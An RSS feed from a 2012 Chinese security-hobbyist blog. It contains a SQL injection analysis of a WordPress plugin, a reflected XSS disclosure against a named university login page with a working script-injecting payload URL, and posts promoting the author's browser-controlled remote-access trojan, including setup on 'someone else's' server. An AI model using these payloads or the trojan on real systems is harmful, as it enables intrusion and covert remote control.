<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>PortWatcher&apos;s Blog | 黑客是一种精神</title>
		<link>https://jury.ucoz.net/</link>
		<description>Blog</description>
		<lastBuildDate>Mon, 03 Dec 2012 15:35:36 GMT</lastBuildDate>
		<generator>uCoz Web-Service</generator>
		<atom:link href="https://jury.ucoz.net/blog/rss" rel="self" type="application/rss+xml" />
		
		<item>
			<title>换新博客了</title>
			<description>www.pwhack.me&lt;div&gt;此博客不再更新。&lt;/div&gt;</description>
			<content:encoded>www.pwhack.me&lt;div&gt;此博客不再更新。&lt;/div&gt;</content:encoded>
			<link>https://jury.ucoz.net/blog/2012-12-03-128</link>
			<category>一些杂文</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/2012-12-03-128</guid>
			<pubDate>Mon, 03 Dec 2012 15:35:36 GMT</pubDate>
		</item>
		<item>
			<title>IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞总结</title>
			<description>挺好的，我复制粘贴就没什么意思了，直接给链接吧。

http://lcx.cc/?i=2848</description>
			<content:encoded>挺好的，我复制粘贴就没什么意思了，直接给链接吧。

http://lcx.cc/?i=2848</content:encoded>
			<link>https://jury.ucoz.net/blog/iis_6_0_7_0_7_5_nginx_apache_web_service/2012-11-15-127</link>
			<category>漏洞信息</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/iis_6_0_7_0_7_5_nginx_apache_web_service/2012-11-15-127</guid>
			<pubDate>Thu, 15 Nov 2012 13:30:51 GMT</pubDate>
		</item>
		<item>
			<title>WordPress AJAX Post Search插件&apos;srch_txt&apos;参数SQL注入漏洞</title>
			<description>我特地下载了这个插件的1.1版本，源码只有一个php文件，cardoza_ajax_search.php。 &lt;br&gt;&lt;br&gt; 搜索&quot;srch_txt&quot;，来到42行，代码如下： &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt; &lt;br&gt;&lt;br&gt; if(isset($_POST[&apos;srch_txt&apos;])){ &lt;br&gt;&amp;nbsp;&amp;nbsp;&lt;b&gt;$search_string = stripslashes($_POST[&apos;srch_txt&apos;]);&lt;/b&gt; &lt;br&gt;&amp;nbsp;&amp;nbsp;if(!empty($search_string)){ &lt;br&gt;&amp;nbsp;&amp;nbsp;global $wpdb; &lt;br&gt;&amp;nbsp;&amp;nbsp;$search_result_posts = $wpdb-&amp;gt;get_col(&quot;select ID from $wpdb- &amp;gt;posts where post_title like &apos;%&quot;&lt;b&gt;.$search_string&lt;/b&gt;.&quot;%&apos; AND post_status = &apos;publish&apos;&quot;); &lt;br&gt;&amp;nbsp;&amp;nbsp;if(sizeof($search_result_posts)!=0){ &lt;br&gt;&amp;nbsp;&amp;nbsp;$args = array(&apos;post__in&apos;=&amp;gt;$search_result_posts); &lt;br&gt;&amp;nbsp;&amp;nbsp;$res = new WP_Query($args); &lt;br&gt;&amp;nbsp;&amp;nbsp;echo &apos;&lt;ul&amp;gt;&apos;; &lt;br&gt;&amp;nb...</description>
			<content:encoded>我特地下载了这个插件的1.1版本，源码只有一个php文件，cardoza_ajax_search.php。 &lt;br&gt;&lt;br&gt; 搜索&quot;srch_txt&quot;，来到42行，代码如下： &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt; &lt;br&gt;&lt;br&gt; if(isset($_POST[&apos;srch_txt&apos;])){ &lt;br&gt;&amp;nbsp;&amp;nbsp;&lt;b&gt;$search_string = stripslashes($_POST[&apos;srch_txt&apos;]);&lt;/b&gt; &lt;br&gt;&amp;nbsp;&amp;nbsp;if(!empty($search_string)){ &lt;br&gt;&amp;nbsp;&amp;nbsp;global $wpdb; &lt;br&gt;&amp;nbsp;&amp;nbsp;$search_result_posts = $wpdb-&amp;gt;get_col(&quot;select ID from $wpdb- &amp;gt;posts where post_title like &apos;%&quot;&lt;b&gt;.$search_string&lt;/b&gt;.&quot;%&apos; AND post_status = &apos;publish&apos;&quot;); &lt;br&gt;&amp;nbsp;&amp;nbsp;if(sizeof($search_result_posts)!=0){ &lt;br&gt;&amp;nbsp;&amp;nbsp;$args = array(&apos;post__in&apos;=&amp;gt;$search_result_posts); &lt;br&gt;&amp;nbsp;&amp;nbsp;$res = new WP_Query($args); &lt;br&gt;&amp;nbsp;&amp;nbsp;echo &apos;&lt;ul&amp;gt;&apos;; &lt;br&gt;&amp;nbsp;&amp;nbsp;while ( $res-&amp;gt;have_posts() ) : $res-&amp;gt;the_post();?&amp;gt; &lt;br&gt;&amp;nbsp;&amp;nbsp;&lt;li&amp;gt;&lt;a href=&quot;&lt;?php the_permalink();?&gt;&quot;&amp;gt;&lt;?php the_title();?&gt;&lt;/a&amp;gt;&lt;/li&amp;gt; &lt;br&gt;&amp;nbsp;&amp;nbsp;&lt;?php&amp;nbsp;&amp;nbsp;&lt;br&gt;&amp;nbsp;&amp;nbsp;endwhile; &lt;br&gt;&amp;nbsp;&amp;nbsp;echo &apos;&lt;/ul&amp;gt;&apos;; &lt;br&gt;&amp;nbsp;&amp;nbsp;} &lt;br&gt;&amp;nbsp;&amp;nbsp;else echo &quot;No posts found for your search&quot;; &lt;br&gt;&amp;nbsp;&amp;nbsp;} &lt;br&gt;&amp;nbsp;&amp;nbsp;else echo &quot;Type your search in the search box.&quot;; &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;br&gt;&amp;nbsp;&amp;nbsp;wp_reset_query(); &lt;br&gt;&amp;nbsp;&amp;nbsp;die(); &lt;br&gt;&amp;nbsp;&amp;nbsp;} &lt;br&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt; &lt;br&gt;&lt;br&gt; 可以看到，srch_txt未经任何过滤就带入了SQL语句里面进行查询，一个十分典型的搜索型注入。 &lt;br&gt;&lt;br&gt; 影响版本有1.0，1.1，1.2 &lt;br&gt;&lt;br&gt; 在最新的1.3版本中，加了一个htmlspecialchars函数对POST来的数据进行了转义: &lt;br&gt; &lt;!--uzcode--&gt;&lt;div class=&quot;bbCodeBlock&quot;&gt;&lt;div class=&quot;bbCodeName&quot; style=&quot;padding-left:5px;font-weight:bold;font-size:7pt&quot;&gt;Code&lt;/div&gt;&lt;div class=&quot;codeMessage&quot; style=&quot;border:1px inset;max-height:200px;overflow:auto;height:expression(this.scrollHeight&lt;5?this.style.height:scrollHeight&amp;gt;200?&apos;200px&apos;:&apos;&apos;+(this.scrollHeight+5)+&apos;px&apos;);&quot;&gt;&lt;!--uzc--&gt; &lt;br&gt; $search_string = stripslashes($_POST[&apos;srch_txt&apos;]); &lt;br&gt; &lt;!--/uzc--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/uzcode--&gt;</content:encoded>
			<link>https://jury.ucoz.net/blog/wordpress_ajax_post_search_39_srch_txt_39_sql/2012-11-13-126</link>
			<category>漏洞信息</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/wordpress_ajax_post_search_39_srch_txt_39_sql/2012-11-13-126</guid>
			<pubDate>Tue, 13 Nov 2012 15:55:01 GMT</pubDate>
		</item>
		<item>
			<title>pwrat v0.5,主要是web端界面美化</title>
			<description>&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 试了几个html5的新东西，比如说type=&quot;number&quot;的input。增加了jquery特效的菜单，虽然不绚丽但比之前的死板超级连接强多了。把cmd命令回显放在《pre》标签内，使得回显更加美观。&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/v05.png&quot; alt=&quot;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;另外在management中增加了一些新功能的链接，打算在1.0正式版中实现（除了键盘记录）：&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/v051.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 既然没有新功能出来，这次就不公开源代码了，大家也不会感兴趣的。&lt;/div&gt;</description>
			<content:encoded>&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 试了几个html5的新东西，比如说type=&quot;number&quot;的input。增加了jquery特效的菜单，虽然不绚丽但比之前的死板超级连接强多了。把cmd命令回显放在《pre》标签内，使得回显更加美观。&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/v05.png&quot; alt=&quot;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;另外在management中增加了一些新功能的链接，打算在1.0正式版中实现（除了键盘记录）：&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/v051.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 既然没有新功能出来，这次就不公开源代码了，大家也不会感兴趣的。&lt;/div&gt;</content:encoded>
			<link>https://jury.ucoz.net/blog/pwrat_v0_5_web/2012-11-08-125</link>
			<category>个人作品</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/pwrat_v0_5_web/2012-11-08-125</guid>
			<pubDate>Thu, 08 Nov 2012 07:05:51 GMT</pubDate>
		</item>
		<item>
			<title>上百种XSS变体</title>
			<description>&lt;a href=&quot;https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet&quot;&gt;https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet&lt;/a&gt;</description>
			<content:encoded>&lt;a href=&quot;https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet&quot;&gt;https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet&lt;/a&gt;</content:encoded>
			<link>https://jury.ucoz.net/blog/xss/2012-10-24-124</link>
			<category>技术文章</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/xss/2012-10-24-124</guid>
			<pubDate>Wed, 24 Oct 2012 11:34:39 GMT</pubDate>
		</item>
		<item>
			<title>pwrat v0.01，一个简单的B/S远控</title>
			<description>&lt;div&gt;我将这款B/S远控命名为PortWatcher RAT(pwrat)，足可体现我对它的喜爱。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;Browser端由php编写，Server端由C#编写。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/pwrat1.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;功能：&lt;/div&gt;&lt;div&gt;注册表开机自启（好水，真的好水），cmdshell&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/pwrat2.png&quot; alt=&quot;&quot; style=&quot;&quot; width=&quot;800pxpx&quot; height=&quot;150pxpx&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;将web目录下的php文件上传到自己（或别人的）的服务器里，然后修改php源码里的password，C#源码里的www.yourdomain.com&lt;/div&gt;&lt;div&gt;在数据库中执行intall.sql中的SQL语句，并修改数据库连接信息&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;发送命令需要指定id，id可以在查看rouji或者上线记录中看到。。&lt;/div&gt;&lt;div&gt;更加干净利索的回显在output.txt中可以看到。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/pwrat3.png&quot; alt=&quot;&quot; style=&quot;&quot; width=&quot;750pxpxpx&quot; height=&quot;400pxpx&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;大家可以根据实际需要修改C#源码中threading.sleep中的时间，和view.php源码中的秒数（目前为120秒，2分钟）&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;由于由C#编写而成，Server运行需要.NET环境，不过现在WIN7的市场份额越来越大，限制会越来越少。&lt;/div&gt;&lt;div&gt;随着自己的学习，陆续会加入文件管理，屏幕监控，键盘记录等，也会想办法优化开机启动方式。&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;有需要的朋友可以到我博客的&quot;Dowload 各种下载&quot;的”个人作品&quot;中下载。&lt;/di...</description>
			<content:encoded>&lt;div&gt;我将这款B/S远控命名为PortWatcher RAT(pwrat)，足可体现我对它的喜爱。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;Browser端由php编写，Server端由C#编写。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/pwrat1.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;功能：&lt;/div&gt;&lt;div&gt;注册表开机自启（好水，真的好水），cmdshell&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/pwrat2.png&quot; alt=&quot;&quot; style=&quot;&quot; width=&quot;800pxpx&quot; height=&quot;150pxpx&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;将web目录下的php文件上传到自己（或别人的）的服务器里，然后修改php源码里的password，C#源码里的www.yourdomain.com&lt;/div&gt;&lt;div&gt;在数据库中执行intall.sql中的SQL语句，并修改数据库连接信息&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;发送命令需要指定id，id可以在查看rouji或者上线记录中看到。。&lt;/div&gt;&lt;div&gt;更加干净利索的回显在output.txt中可以看到。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/pwrat3.png&quot; alt=&quot;&quot; style=&quot;&quot; width=&quot;750pxpxpx&quot; height=&quot;400pxpx&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;大家可以根据实际需要修改C#源码中threading.sleep中的时间，和view.php源码中的秒数（目前为120秒，2分钟）&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;由于由C#编写而成，Server运行需要.NET环境，不过现在WIN7的市场份额越来越大，限制会越来越少。&lt;/div&gt;&lt;div&gt;随着自己的学习，陆续会加入文件管理，屏幕监控，键盘记录等，也会想办法优化开机启动方式。&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;有需要的朋友可以到我博客的&quot;Dowload 各种下载&quot;的”个人作品&quot;中下载。&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;下载已被关闭，因为还是雏形产品！&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;下面做点原理介绍：&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; 思路参考了某期《黑客手册》中”爱梅小礼。菜客&quot;的文章，这里特作说明。不过他是用DELPHI+ASP实现的。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;具体原理如下:(我去啊这个绘图软件未注册竟然这样...)&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/yuanli.png&quot; alt=&quot;&quot; style=&quot;&quot; width=&quot;750pxpxpxpxpxpx&quot; height=&quot;400pxpxpxpxpxpx&quot;&gt;&lt;br&gt;&lt;/div&gt;</content:encoded>
			<link>https://jury.ucoz.net/blog/pwrat_v0_01_b_s/2012-10-19-123</link>
			<category>个人作品</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/pwrat_v0_01_b_s/2012-10-19-123</guid>
			<pubDate>Fri, 19 Oct 2012 14:36:29 GMT</pubDate>
		</item>
		<item>
			<title>谈一谈最近挺出风头的TH4ck小组和自己的近况</title>
			<description>&amp;nbsp; 关注圈子的人最近应该都知道有个叫th4ck的小组大出风头，黑了土司，绿色兵团，暗组，华中帝国，黑白同盟，红盟，90sec。&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; 群里讨论出了一些问题。小冰先提出来是劫持，而且是傻瓜式的劫持。强行修改某台可控服务器的IP为要&quot;黑”的网站的服务器IP。我们开始都不相信，因为娇娇姐提出这样会出现轮流掉的情况，自己在虚拟机内网都能测试的。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; 后来还是发现了一些问题。&lt;/div&gt;&lt;div&gt;&amp;nbsp; 主要分析绿色兵团被黑的情况。先在bing上搜索ip:210.52.223.31。在所有该IP服务器下的站，都被TH4ck挂了黑页。莫非这个组织把所有该服务器下的网站都&quot;入侵”了吗？还是说服务器被劫持了呢？&lt;/div&gt;&lt;div&gt;&amp;nbsp; 顺便吐槽一句：Hackerd by Th4ck，这英语实在是太牛B了！&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; 后来Tm3yShell7又贴了一个netcraft的地址，如下图所示，可以看到，该域名指向的服务器已在今天被更改，而且是从一贯的LAMP改为了WIN+IIS。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/netcraft.jpg&quot; alt=&quot;&quot; style=&quot;&quot; width=&quot;750pxpxpx&quot; height=&quot;350pxpxpx&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 我们还能看到，虽然服务器改了，但外网IP没有变，说明WIN2003和LINUX服务器是在同一内网的。&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 于是我们最终相信，这伙人只是修改了某台可控的服务器IP为他们要&quot;黑”的网站的IP。并且这样的劫持的成功条件是处于同一内网。&lt;/div&gt;&lt;div st...</description>
			<content:encoded>&amp;nbsp; 关注圈子的人最近应该都知道有个叫th4ck的小组大出风头，黑了土司，绿色兵团，暗组，华中帝国，黑白同盟，红盟，90sec。&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; 群里讨论出了一些问题。小冰先提出来是劫持，而且是傻瓜式的劫持。强行修改某台可控服务器的IP为要&quot;黑”的网站的服务器IP。我们开始都不相信，因为娇娇姐提出这样会出现轮流掉的情况，自己在虚拟机内网都能测试的。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; 后来还是发现了一些问题。&lt;/div&gt;&lt;div&gt;&amp;nbsp; 主要分析绿色兵团被黑的情况。先在bing上搜索ip:210.52.223.31。在所有该IP服务器下的站，都被TH4ck挂了黑页。莫非这个组织把所有该服务器下的网站都&quot;入侵”了吗？还是说服务器被劫持了呢？&lt;/div&gt;&lt;div&gt;&amp;nbsp; 顺便吐槽一句：Hackerd by Th4ck，这英语实在是太牛B了！&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; 后来Tm3yShell7又贴了一个netcraft的地址，如下图所示，可以看到，该域名指向的服务器已在今天被更改，而且是从一贯的LAMP改为了WIN+IIS。&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/netcraft.jpg&quot; alt=&quot;&quot; style=&quot;&quot; width=&quot;750pxpxpx&quot; height=&quot;350pxpxpx&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 我们还能看到，虽然服务器改了，但外网IP没有变，说明WIN2003和LINUX服务器是在同一内网的。&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 于是我们最终相信，这伙人只是修改了某台可控的服务器IP为他们要&quot;黑”的网站的IP。并且这样的劫持的成功条件是处于同一内网。&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 我猜测，这伙人，应该是先查询了目标站的托管主机的服务商，然后在相同的服务商注册服务。这是一种方法，也可能是直接拿下处于同一内网的脆弱服务器，然后再劫持。&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://jury.ucoz.net/imges/comments.jpg&quot; alt=&quot;&quot; width=&quot;800pxpx&quot; height=&quot;350pxpx&quot; style=&quot;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 不做过多评论了。&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 最近报名了两个比赛，一个考试：杭电ACM月赛（11月13号开赛），杭电第四届网络攻防大赛（11月1号开赛），计算机二级C（十二月考试）。&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 其实冷夜兄说得对，报名参加这类考试和比赛，不是为了得高分，得成绩，得证，而是为了给自己一个机会去静下心来好好学习知识。&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&amp;nbsp; 我也是抱着这样的心态参加的，加油吧！&lt;/div&gt;</content:encoded>
			<link>https://jury.ucoz.net/blog/th4ck/2012-10-09-122</link>
			<category>一些杂文</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/th4ck/2012-10-09-122</guid>
			<pubDate>Tue, 09 Oct 2012 15:07:09 GMT</pubDate>
		</item>
		<item>
			<title>换回WIN7,感谢BT</title>
			<description>&amp;nbsp; 大学的课程所需要的软件大部分是基于Win平台下的，而且一些IDE根本就不是随便能WINE出来的。也出于实用性的考虑，我读的专业是软件工程，并非信息安全，接触黑阔层面的事情可能会越来越少，BT5也不是必须的了。&lt;div&gt;&amp;nbsp; 本来是打算搞双系统，但先装Linux再装Win的方式搞双系统很麻烦。要修复GRUB引导，挂到NTLoader(或bootmgr)下什么的。&lt;/div&gt;&lt;div&gt;&amp;nbsp; 后来打算把Win7装入刚买的1TB的移动硬盘，我了个去啊移动硬盘识别不出来。虽然我买的移动硬盘是富士康的，但我电脑也不用这么爱国抵制日货吧。&lt;/div&gt;&lt;div&gt;&amp;nbsp; 最后忍痛割爱，直接装Win7，把BT5打入Live USB冷宫。

 还是很感谢BT，如果不是它，我这个小菜根本不会静下心来去搞高深的Linux。我也不想评价Linux与Windows的优劣，面向的用户群体就不一样。&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &amp;nbsp;加油。 &lt;/div&gt;</description>
			<content:encoded>&amp;nbsp; 大学的课程所需要的软件大部分是基于Win平台下的，而且一些IDE根本就不是随便能WINE出来的。也出于实用性的考虑，我读的专业是软件工程，并非信息安全，接触黑阔层面的事情可能会越来越少，BT5也不是必须的了。&lt;div&gt;&amp;nbsp; 本来是打算搞双系统，但先装Linux再装Win的方式搞双系统很麻烦。要修复GRUB引导，挂到NTLoader(或bootmgr)下什么的。&lt;/div&gt;&lt;div&gt;&amp;nbsp; 后来打算把Win7装入刚买的1TB的移动硬盘，我了个去啊移动硬盘识别不出来。虽然我买的移动硬盘是富士康的，但我电脑也不用这么爱国抵制日货吧。&lt;/div&gt;&lt;div&gt;&amp;nbsp; 最后忍痛割爱，直接装Win7，把BT5打入Live USB冷宫。

 还是很感谢BT，如果不是它，我这个小菜根本不会静下心来去搞高深的Linux。我也不想评价Linux与Windows的优劣，面向的用户群体就不一样。&amp;nbsp;&lt;/div&gt;&lt;div&gt;&lt;br&gt;&lt;/div&gt;&lt;div&gt;&amp;nbsp; &amp;nbsp;加油。 &lt;/div&gt;</content:encoded>
			<link>https://jury.ucoz.net/blog/win7_bt/2012-08-30-119</link>
			<category>一些杂文</category>
			<dc:creator>Jury</dc:creator>
			<guid>https://jury.ucoz.net/blog/win7_bt/2012-08-30-119</guid>
			<pubDate>Thu, 30 Aug 2012 07:13:31 GMT</pubDate>
		</item>
		<item>
			<title>杭电新生调查表登录处反射型XSS</title>
			<description>By: PortWatcher&amp;nbsp;
&lt;div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;
&lt;div&gt;很无聊的一个漏洞，应该只能配合社工才能发挥作用。一个GET参数没有过滤。我认为这个参数根本就不该暴露给用户，因为没有意义，可能是因为编程简单一些吧。
&lt;div&gt;URL：&lt;a href=&quot;http://xsdcb.hdu.edu.cn/login.asp&quot; target=&quot;_blank&quot;&gt;http://xsdcb.hdu.edu.cn/login.asp&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;这个地方的ERRMSG后面的参数直接放入 alert函数，没有做任何过滤。我们可以通过闭合之前的&lt;script&amp;gt;标签，然后构造自己的&lt;script&amp;gt;标签达到让浏览器运行我们构造的JS脚本的目的。&lt;/div&gt;
&lt;div&gt;这里还是以弹一个框框为例，注意这里的框框不是MSGERR的框框，而是我们自己构造出来的，我们还可以把它修改为任意XSS，自己看代码，不做过多解释。&lt;/div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;
&lt;div&gt;例如：&lt;/div&gt;
&lt;div&gt;&lt;a target=&quot;_blank&quot; href=&quot;http://xsdcb.hdu.edu.cn/login.asp?ErrMsg=&apos;);%3C/script%3E%3Cscript%3Ealert(&apos;xss%20pw&quot;&gt;http://xsdcb.hdu.edu.cn/login.asp?ErrMsg=&apos;);&lt;/script&amp;gt;&lt;script&amp;gt;alert(&apos;xss pw&lt;/a&gt; &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;div&gt;&lt;br&gt;&lt;/div&gt;
